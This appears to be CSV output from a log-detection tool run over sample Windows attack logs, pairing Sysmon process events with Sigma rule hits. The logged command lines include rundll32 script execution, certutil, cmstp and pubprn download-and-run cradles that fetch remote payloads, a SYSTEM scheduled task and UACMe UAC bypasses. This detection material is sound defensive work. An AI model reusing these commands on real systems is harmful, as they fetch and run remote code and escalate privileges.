2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
